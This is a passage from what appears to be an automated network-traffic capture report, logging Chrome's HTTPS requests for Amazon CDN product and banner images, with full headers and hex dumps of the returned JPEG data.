                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC961INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 5203
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: f1a37ed3-9250-406f-bcb0-6580422378a6
                                                                                                                                                                                                        Date: Sat, 10 Aug 2024 06:23:02 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 08 Aug 2023 07:14:49 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-173,/images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332325_186x116_1X_en_AE
                                                                                                                                                                                                        Expires: Fri, 05 Aug 2044 06:23:02 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-173 /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332325_186x116_1X_en_AE
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 8bb90d44758ce70476efdf577c8bd268.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 200085
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: KP0HZHpnIIOX_GfhSJQYdDDI_tbf8tAxsLe__1z26k9ZCZ_j3OWWvQ==
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC5203INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 39 00 01 00 02 02 02 03 01 00 00 00 00 00 00 00 00 00 00 08 09 05 07 01 06 02 03 04 0a 01 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 08 05 06 07 09 01 02 04 0a ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b2 01 b9 88 6e 00 00 00 1c
                                                                                                                                                                                                        Data Ascii: JFIFt"9n


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        98192.168.2.44987918.165.191.1594434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC378OUTGET /images/I/416xoG90KZL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: m.media-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC829INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 5074
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 97e0232e-88d5-4681-be88-b5fc6b01ee5e
                                                                                                                                                                                                        Date: Sat, 10 Aug 2024 10:40:12 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 07 May 2024 20:39:23 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-273,/images/I/416xoG90KZL
                                                                                                                                                                                                        Expires: Fri, 05 Aug 2044 10:40:12 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-273 /images/I/416xoG90KZL
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 f6d3d027dc70c7291c2f685efb187ab2.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                                                                                                        X-Amz-Cf-Id: Y3zjlJG2smcA7_rVTNVgdcabEi9yB7k9MFBM03U1Y1jXEgXYHVJu5A==
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC5074INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 07 04 05 06 08 09 03 01 02 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 05 04 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 dc b0 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"5


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        99192.168.2.449880151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC683OUTGET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-YjI1NWNkYTQt-w379._SY304_CB641947165_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 25781
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 05896173-2fc4-4bca-8e7e-7bc9044465bd
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Thu, 02 Sep 2021 17:01:37 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Tue, 17 May 2044 03:39:09 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 174347
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:06 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000092-IAD, cache-ewr-kewr1740051-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 84 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c2 00 11 08 01 30 01 7b 03 01 22 00 02 11 01 03 11 01 ff c4 00 38 00 01 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 07 05 06 08 09 02 03 04 01 0a 01 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 05 02 03 04 06 07 01 08 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 da 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: JFIF0{"8
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: ba 8e c5 89 70 96 d5 63 db 95 6b ab d5 3a e5 3a bd 78 53 f6 91 e1 8c 6a e7 db b1 48 d6 fd ec 34 fb 95 36 14 8e 34 55 e7 d8 a7 5c 6e 4e 04 4b 53 2d d7 93 46 61 4b 90 5c df b3 6b 7d a7 9f 22 d7 a1 e3 f6 3c 00 00 00 00 1e e8 8a f1 b3 79 69 ff 00 52 65 b5 b7 09 dc 38 33 99 2b 0a d2 29 79 d9 b6 45 a5 7a 5a 59 dc 1f af e5 72 89 66 6b 95 7e 89 27 66 c3 54 7d 97 6b 6f e6 71 55 0e 6a f9 56 3c 3b e7 bd ef fc 29 58 02 a3 92 55 6b d8 f8 b5 c7 2c 6b 78 77 70 8b b7 35 ed 9b ac 3e fb 92 5e 4c fc 08 2f d9 35 75 7b 44 35 c3 2b fe c2 ec 38 c1 d9 94 51 44 1e 54 21 45 bb 68 36 f6 8c a3 d9 b6 b2 36 6d 2d a2 72 19 90 80 00 3c c7 6f 5d 0e df 2f 4f 0c 47 1c 9a e6 a0 66 7c 3f ad f7 cb 46 e2 a7 55 35 9e d9 9e 18 d3 25 c4 3b 2f 34 c7 db 72 ec b4 ae 73 2b 92 f5 b1 64 bb 79 71 ff 00
                                                                                                                                                                                                        Data Ascii: pck::xSjH464U\nNKS-FaK\k}"<yiRe83+)yEzZYrfk~'fT}koqUjV<;)XUk,kxwp5>^L/5u{D5+8QDT!Eh66m-r<o]/OGf|?FU5%;/4rs+dyq
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: 42 85 db 4f ca 74 c8 4e 23 fe c6 2a 90 41 33 c3 5e f0 cb 98 05 25 28 4e c0 bd 72 a8 26 89 06 c1 85 e6 39 14 80 ab 79 9f 1c d6 c6 89 29 e5 11 5d d1 60 2c e6 92 18 45 16 6c 71 f5 1c cc 95 00 0b 92 a0 85 15 76 8e 16 b2 da 16 df 2d 53 b3 1e 3e 28 5e d9 16 30 d3 bb 94 6c e2 c7 0e c0 4a b8 d4 9e ef 1c ec 53 5f ee 2d 63 c7 2f 62 4b 93 21 14 63 19 de f3 39 ef 2c 4f c2 03 18 21 ed b3 77 20 9e 32 f3 c5 23 09 e5 6b 9a f0 31 30 0c 27 1d dc 79 9b 0d cc 0c 76 8d a1 6f 4b ec 42 f4 41 10 6b 34 fd 96 4c 61 0e 31 94 f2 18 69 71 e0 c8 46 10 88 5a 49 84 90 af 43 d4 9c f6 af 94 b4 f4 7d 82 4f 55 96 31 50 c8 ad 33 eb 06 35 fc 13 b0 e3 c9 2f f5 e4 15 fe af 0b e4 ef 4c b2 d6 56 87 b0 40 cd 06 af 91 09 ad 68 8d f1 1a c0 78 5f 88 33 9c fe 4a cd 79 39 a9 8d f8 89 3b 65 4c ae ba ef
                                                                                                                                                                                                        Data Ascii: BOtN#*A3^%(Nr&9y)]`,Elqv-S>(^0lJS_-c/bK!c9,O!w 2#k10'yvoKBAk4La1iqFZIC}OU1P35/LV@hx_3Jy9;eL
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: a9 4d bf 7e d7 7c ef 17 95 db b6 5f df 1d 84 7a 28 91 99 0d a2 2b e3 be 3a 05 5c 5e 6f 8b 34 71 e4 17 95 a9 9e 4b 47 97 0c 4e d2 aa ab 03 8a 4d 57 b4 a5 67 44 8e 7c d2 0c 8c 62 a7 25 72 f8 b3 2a 86 d5 37 9a 5b 5a b4 4f 93 9f 0c ff 00 4a 8f ec a0 89 4f 36 73 12 5c fe d0 5a 84 1d c3 fb 0d 4d 93 8d 2b 55 03 b7 c9 97 13 52 db 1a ba 4e 9f 92 07 6b 3b 87 ca ed 0d 66 b0 b9 61 dc 77 12 51 ec ac 4d 2e 5b 00 8b ea 01 8c 44 6b 92 d9 8d 51 a3 96 b1 13 bf 2b b6 c5 f0 4c b7 20 0d 6c a4 00 e3 ac 92 2b 12 55 0c b0 b9 5a 8f f0 5d 95 13 7c ad 9e e9 2f 27 68 8f 39 f0 dc 26 91 e7 ef 09 7c 8a 73 a3 db e2 d7 2b 37 d8 92 1e e4 e2 ad 5f 96 f9 5f 2d 03 23 25 cd 56 d4 bc 29 f0 d7 f4 9c 7f b2 64 b7 c3 65 bb c4 59 9d 18 54 ac 8b d9 8d 63 21 d2 65 44 97 3e 86 43 df 05 4f 2e da 6f 69
                                                                                                                                                                                                        Data Ascii: M~|_z(+:\^o4qKGNMWgD|b%r*7[ZOJO6s\ZM+URNk;fawQM.[DkQ+L l+UZ]|/'h9&|s+7__-#%V)deYTc!eD>CO.oi
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: 4f c1 4a 7a 31 78 c0 b6 5a 52 34 b0 60 7c 44 8c ff 00 09 91 ee 82 e3 4a ec 13 ea 3a 50 c2 c8 e7 19 9a 00 f3 e9 15 ac 6b e3 9a 13 fc ce 7f 7f 44 ad 8e d1 e4 dd 73 09 15 7a 73 f5 64 93 05 ae 8c 39 cf f3 a1 63 ca 58 53 3a a0 59 b5 d2 9c aa f4 7d 70 d8 aa db 02 c8 94 83 73 9a 83 8f 08 44 c3 a2 39 9c db 1d 7c 99 f0 f9 57 bf 9f f6 4e 77 1c ba 32 9a ba 48 99 dc 56 8c 6a 22 bf 4f d9 3d d9 5d 4f 38 12 46 43 da 55 4a 9f 25 c4 02 69 99 b9 14 36 b0 e0 92 20 df a7 66 b9 ca b9 f4 ec dd bc 7e 9d 9f 8f d3 13 1f 9f 4a 4f 4f 4f a5 6c 73 e9 4b 05 f5 66 95 b2 17 b3 b8 ef 53 d1 d4 17 4f f7 2e 93 b1 55 dd 7e 95 b2 4f 4f a5 ed 33 e9 6b 3c fa 62 d3 3e 97 b4 cf a5 ed 33 e9 7b 4c 4d 2f 6a 99 f4 e5 ba fa a6 9e b6 41 ab 50 3a 7a d0 69 b6 69 1a d9 f5 d7 2d 39 c6 5e a7 d9 71 4c e0 dc
                                                                                                                                                                                                        Data Ascii: OJz1xZR4`|DJ:PkDszsd9cXS:Y}psD9|WNw2HVj"O=]O8FCUJ%i6 f~JOOOlsKfSO.U~OO3k<b>3{LM/jAP:zii-9^qL
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: 97 1e f1 fd ca 2a 7e 22 98 6b be a9 b7 5c 3a bd c9 b0 dd a5 71 69 f7 ad 13 8d 6b 8b 10 84 8d d7 7f 54 21 a8 d9 74 d3 d6 84 3f c8 7d e8 43 79 98 83 73 f5 46 f3 f4 cf 18 0e df 6f 91 38 e2 65 8c 86 ed 0e ff 00 c2 b3 7c ae d0 fc 4e 95 d7 bb 4e 07 d4 a0 f9 2e f9 18 6a d1 f7 b0 04 2b 43 e1 b2 e7 1b 22 79 69 38 e1 5a 62 72 af 68 51 d1 bb 25 8e a7 bc 62 7b 53 aa 32 4e 2a d5 e2 bf d4 17 94 46 3f b4 cc 5a 53 c3 fa b9 3e bd 9f 9b 94 5d 21 c0 52 e5 cd 9b bf 6b 82 3c be 6f ec f9 ab eb df ec f2 2e 8b dd eb 54 6b 2b 59 67 90 54 02 71 a7 12 af 78 42 48 5c 58 ef 94 56 80 ed a3 72 a5 41 ee 5e 08 b2 49 71 85 c2 36 d9 db ad c3 25 61 6d 82 42 4b 6f 59 09 8f 1e ca 55 38 da ac 03 39 7a 71 fd ed fd 7c a2 b5 51 b8 be 97 b5 45 55 fa 6c d2 0a 15 d2 9d 9f 9b 97 1c 5b bf 70 df fb 54
                                                                                                                                                                                                        Data Ascii: *~"k\:qikT!t?}CysFo8e|NN.j+C"yi8ZbrhQ%b{S2N*F?ZS>]!Rk<o.Tk+YgTqxBH\XVrA^Iq6%amBKoYU89zq|QEUl[pT
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: e5 ba 07 e2 c6 39 cd bd a4 38 1c 3a 88 1e ad eb 41 64 81 ce a7 8e be 4b f7 91 4f 8c 53 2e b2 31 7b 07 0e ac 32 4c 7b 1f 20 a3 9c d6 e7 52 38 f0 50 1b c5 c6 b7 a8 08 d6 38 53 1d a1 4a 30 e8 c0 69 d9 50 4a 38 5d bc 6a 43 43 4f c5 d5 47 55 b7 89 ae 7d 60 ed 06 f7 26 24 aa f3 6b 7b f4 5f 58 ff 00 5f 91 12 2c ac 7e b0 1d 27 39 d4 68 4e 7c 36 2b 3c ed bb 38 3a f8 96 d0 37 aa f6 69 86 40 cb 53 5a d6 b8 d6 ae a3 33 3d 65 7d 20 b2 34 57 b2 45 fc 3b 9d ff 00 c0 3d ea ca 6d 4c 6d b2 42 e8 6a 5b 7c 0b bb 7b 3d 0a c6 6c b6 53 e2 58 06 4e 61 38 fc 70 5c d0 ed 23 38 07 62 9c 20 b4 0f 3b 98 ef 72 ab 43 8d 38 38 21 ab 2e b8 5f c4 47 f9 87 2b 2e 62 dc 2e dd 39 72 b1 b5 bc 4d fd bd 49 b1 87 42 59 aa 24 d1 17 1b ba d5 71 75 7a 3b 37 a9 5c e8 1a da be 46 48 db 8e 17 48 ba ea
                                                                                                                                                                                                        Data Ascii: 98:AdKOS.1{2L{ R8P8SJ0iPJ8]jCCOGU}`&$k{_X_,~'9hN|6+<8:7i@SZ3=e} 4WE;=mLmBj[|{=lSXNa8p\#8b ;rC88!._G+.b.9rMIBY$quz;7\FHH
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: b1 21 3d af 04 eb 32 9a bd 40 53 20 a6 22 f0 d5 7f 49 bb 4b 6b d5 97 51 e0 87 21 44 e3 11 c9 b5 f4 ec f9 e6 9b 0d af 6c c0 56 39 3a f7 15 72 78 cf 4a 33 50 50 a7 0e 4b 33 1e 23 14 ad ea 28 db 1e a5 29 5c 39 77 2f 1a eb c7 c5 89 09 d8 ee 8e cd 88 b8 51 f7 b9 d9 eb 0d 8a 57 41 2f 4b 3b ae e3 c1 5b 22 3f 7a bf ec 40 3c 4b 99 69 a9 ec f7 23 79 87 1a 84 f0 4e e2 9d 71 ee c5 d1 e6 d3 d6 14 8d 82 d3 0b 83 5d 41 79 bd 9e 95 69 c4 57 5a ed 30 e2 ae 5a 21 76 6e 66 2a ca 6d 10 e9 64 7b 24 64 ec 68 2d 73 8b a8 6a 6a 33 56 4b 2b 66 b8 63 6d a6 39 7c 5b 07 dd e7 76 53 62 86 c1 7e 30 35 9f 2b dc 30 db 4b 98 77 ab 05 95 e1 8e a9 6b 67 bd 25 29 4d 4b cd 00 2f 02 4a c1 3b 8c 8e f1 f1 54 b8 e6 69 79 47 ad 79 ef 20 64 db cf 2e a5 7b 53 bf 0b 50 d5 6d 1a 49 af 8a 65 c0 6b de
                                                                                                                                                                                                        Data Ascii: !=2@S "IKkQ!DlV9:rxJ3PPK3#()\9w/QWA/K;["?z@<Ki#yNq]AyiWZ0Z!vnf*md{$dh-sjj3VK+fcm9|[vSb~05+0Kwkg%)MK/J;TiyGy d.{SPmIek
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: cf 03 ff 00 08 6d 93 49 15 b2 ae 74 8c b6 99 97 51 bf 24 62 62 57 a4 e4 53 d6 3e 3b 73 2f 62 57 c6 e1 c2 e6 52 e7 bc bb b9 81 fa 47 0c f8 df b4 a8 00 df 7b c3 18 e8 a5 db 2f 12 d6 75 95 f0 9a 3d 1a 2a 9d bf c9 c2 17 16 f8 a8 62 21 ca 9c ba d7 79 7e a9 51 67 d4 96 ac 4a 31 dd 58 e2 00 00 41 87 0f 2c 3e 96 a8 2f 17 01 7e 6b c4 bf a0 07 e4 2a 1e b3 62 83 85 4e 7a c7 2e a5 bb 81 39 0e 4f 93 db bc 17 5b 63 fd c4 a9 7f 09 8c 53 2b b9 94 73 1d d7 a1 5e b3 02 65 8e d3 68 4b fa 49 c8 c1 97 2d 6d 70 4f 0a de 6d bc 1d 60 98 9c 6e 8b 2c 79 2f d5 1b 6d 4b 85 69 9c 18 62 25 54 14 85 32 08 ae 38 8c 37 05 15 4d 4c 8e 8f 54 83 6e a6 9b fe 0f a7 11 d8 b9 fc 50 cc b5 a8 14 7a dc bb c2 81 1b 1a f9 dc b5 76 55 ac 3a 98 37 85 a4 5d 5e fd d9 99 1b 2d c0 ad b3 00 0e 2d 44 e1 aa
                                                                                                                                                                                                        Data Ascii: mItQ$bbWS>;s/bWRG{/u=*b!y~QgJ1XA,>/~k*bNz.9O[cS+s^ehKI-mpOm`n,y/mKib%T287MLTnPzvU:7]^--D
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: c1 9a 4f 3d 3d b9 fa ca a9 b9 b4 ba f3 ea 72 fa 7a c2 ed 05 5c c7 39 2e a6 06 46 07 a0 f0 07 1c a3 12 29 ca a7 2a ee ac ab c2 0f ac db de 62 71 f2 47 e0 bc d6 1c 46 d3 b1 72 e0 3f bf 11 d1 67 e0 fe 9a 30 2e 41 d0 8b 59 0f d7 99 9a 2b 98 cf 52 54 f8 86 28 04 c4 e4 c9 ab c8 53 65 11 6f 9c dd 80 65 2d ad 0b 5c ee 2b 0b 02 56 42 63 b3 86 25 8d f8 47 0c d2 db 71 75 82 d7 32 d3 a5 01 91 a9 40 d5 5b 14 72 99 7a 83 76 14 31 7d 5f 45 4c 2a aa 07 be 8a b2 df 92 59 ac 77 5c a1 58 d3 1c 25 16 89 0c 61 0b 28 94 d9 8b 32 0c e9 89 8c 8e 28 2d 79 79 60 97 ea 63 b4 7a f5 6b 77 a6 5c e0 cc dd 97 ba b2 ef 7c dc 66 6d d3 ee 42 97 7e cf f0 9e 47 6d ac c9 e4 14 82 87 6d ea 70 73 1e 30 f7 82 57 ea ca aa 5b 8d 3c c0 dc 5a 02 3a 95 6b d7 d5 d2 12 8e 16 05 0f a0 2e b0 ae 23 62 00
                                                                                                                                                                                                        Data Ascii: O==rz\9.F)*bqGFr?g0.AY+RT(Seoe-\+VBc%Gqu2@[rzv1}_EL*Yw\X%a(2(-yy`czkw\|fmB~Gmmps0W[<Z:k.#b


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        100192.168.2.449881151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC714OUTGET /images/G/39/VAS_MENA/2024/GW/QC/Furniture/XCM_CUTTLE_ORIGIN_1707658_3701318_186x116_1X_en_AE_Version_3._SY116_CB561430975_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 1888
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: c095514b-e814-495e-9af1-afb3f3cf2349
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Wed, 27 Mar 2024 21:51:16 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Tue, 21 Jun 2044 11:44:52 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 202092
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:06 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kcgs7200060-IAD, cache-ewr-kewr1740058-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 32 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 05 06 03 04 07 02 08 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fa 0c 76 f1 80 00 00 00 00 00 00 00 00 00 23 49
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"2v#I
